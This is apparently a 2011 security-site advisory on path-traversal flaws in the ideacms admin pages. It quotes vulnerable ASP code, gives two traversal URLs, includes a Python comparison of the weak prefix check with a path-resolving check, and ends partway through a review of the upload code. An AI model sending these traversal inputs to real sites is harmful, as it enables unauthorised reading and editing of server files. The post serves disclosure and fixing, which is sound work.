myhack58 | Anonymous | MYHACK58:62201131926
Sep 26, 2011 - 12:00 a.m.

ideacms article management system vulnerabilities and fixes

Source: www.myhack58.com

'\admin\admin_upfile.asp
<%
' ... (omitted)
dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
dim dirTemplate : dirTemplate="../Upload"
dim path : path=getForm("path","get") : if isNul(path) then path=dirTemplate
' only the first 9 characters of path are compared with the allowed directory
if left(path,9)<>"../Upload" then alert "only allow editing of the Upload Directory","admin_upfile.asp" : die ""
' ... (omitted)
%>

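The check is flawed: only the first 9 characters of path are compared with "../Upload", so whatever follows that prefix, including further "../" segments, is accepted.

Exploitation:

http://www./admin/admin_upfile.asp?path=../Upload/../../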

'\admin\admin_template.asp
<%
checkPower
' ... (omitted)
dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
dim dirTemplate : dirTemplate="../template"
dim path : path=getForm("path","get") : if isNul(path) then path=dirTemplate
' only the first 11 characters of path are compared with the allowed directory
if left(path,11)<>"../template" then alert "only allow editing of the template directory","admin_template.asp" : die ""
' ... (omitted)
%>

The check is flawed in the same way: only the first 11 characters of path are compared with "../template".

Exploitation:

http://www./admin/admin_template.asp?action=edit&filedir=../template/../robots.txt
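
Both checks above (left(path,9) against "../Upload" and left(path,11) against "../template") compare a string prefix before the path has been resolved. As an added example, not ideacms code, this Python model puts that prefix test beside a check that resolves the path first and then tests containment; the /admin script directory and all sample paths except the one taken from the first URL above are assumptions.

```python
import posixpath

SCRIPT_DIR = "/admin"    # assumed virtual directory holding the admin scripts
ALLOWED = "../Upload"    # literal that admin_upfile.asp compares against


def prefix_check(path: str) -> bool:
    """Model of the page's check: left(path, 9) = "../Upload"."""
    return path[:len(ALLOWED)] == ALLOWED


def resolve(path: str) -> str:
    """Resolve a request path, relative to SCRIPT_DIR, to a canonical virtual path."""
    unified = path.replace("\\", "/")    # Windows accepts both separators
    return posixpath.normpath(posixpath.join(SCRIPT_DIR, unified))


def canonical_check(path: str) -> bool:
    """Accept only paths that are still inside the allowed directory once resolved."""
    base = resolve(ALLOWED).lower()      # "/upload"; Windows paths are case-insensitive
    target = resolve(path).lower()
    return target == base or target.startswith(base + "/")


# Constructed sample inputs; the second is the path value from the URL on the page.
SAMPLES = [
    "../Upload",
    "../Upload/../../",
    "../Upload/2011-09/a.jpg",
    "../Uploadbackup",
    "..\\Upload\\..\\admin",
]


def compare(samples=SAMPLES):
    """Return (path, prefix_check result, canonical_check result) for each sample."""
    return [(p, prefix_check(p), canonical_check(p)) for p in samples]


if __name__ == "__main__":
    for p, weak, strong in compare():
        print(f"{p!r:28} prefix={weak!s:5} canonical={strong}")
```

The rows where the two columns disagree are the inputs the original check lets through; the same comparison applies to admin_template.asp with "../template" as the allowed directory.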

shell review:

'/admin/upload.asp
<%
' ... (omitted)
attachdir="/"+sitePath+"upload" 'upload save path, without a trailing /
dirtype=2 '1: store in per-day directories, 2: per-month directories, 3: per-extension directories; per-day storage is recommended
maxattachsize=2097152 'maximum upload size, default is 2M
upext="txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid" 'allowed upload extensions
' ... (omitted)
if upfile.isErr=3 then
    err="Upload file extension required is:"+upext
else
    err=upfile.ErrMessage
' ... (omitted)
Dim tmpPath
isErr_=0
Set oFileStream = CreateObject("ADODB.Stream")
oFileStream.Type = 1
oFileStream.Mode = 3
oFileStream.CharSet = "gb2312"
' ... (omitted)
tmpPath=Split(Path,".")(0)
FileExt=GetFileExt(Path)
if Over then
    if isAllowExt(FileExt) then
        oFileStream.SaveToFile tmpPath & "." & FileExt,2
        if Err.number<>0 then OutErr("File Save error,please check the path,whether the existence of the Upload Directory! The file path to save to" & tmpPath & "." & FileExt)
    Else
        isErr_=3
        ErrMessage_="the suffix name of the file not allowed to upload!"
        OutErr("the suffix name of the file not allowed to upload")
    End if
Else
' ... (omitted)
Public Function FileData(Item)
isErr_=0
if file.Exists(Item) then
    if isAllowExt(File(Item).FileExt) then
' ... (omitted)
    Else
        isErr_=3
        ErrMessage_="the suffix name of the file not allowed to upload"
        OutErr("the suffix name of the file not allowed to upload")
        FileData=""
    End if
else
